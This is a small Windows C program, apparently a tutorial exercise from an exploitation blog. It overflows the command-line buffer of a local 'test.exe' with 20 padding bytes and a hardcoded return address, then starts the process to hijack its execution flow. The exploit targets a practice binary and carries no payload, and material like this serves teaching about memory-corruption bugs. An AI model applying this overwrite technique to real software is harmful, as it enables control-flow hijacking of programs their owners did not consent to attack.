#include <string.h>
#include <stdio.h>
#include <windows.h>

int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    si.cb = sizeof(si);

    char ret[] = "\xF1\x12\x40";

    char name[] = "test.exe ";
    char* remplissage = (char*) malloc(sizeof(char) * 21);

    remplissage[20] = '\0';
    memset(remplissage,'a',20);

    int alloc = ((strlen(name) + strlen(remplissage) + strlen(ret) + 1 ));

    char* exploitation = (char*) malloc(sizeof(char) * alloc );
    ZeroMemory(exploitation,alloc);

    strncat(exploitation,name,strlen(name));
    strncat(exploitation,remplissage,strlen(remplissage));
    strncat(exploitation,ret,strlen(ret)+1);

    printf("Exploit 3 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    if(CreateProcess(NULL,exploitation,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
        printf("Processus cree.\n");
    }

    WaitForSingleObject(pi.hProcess,INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}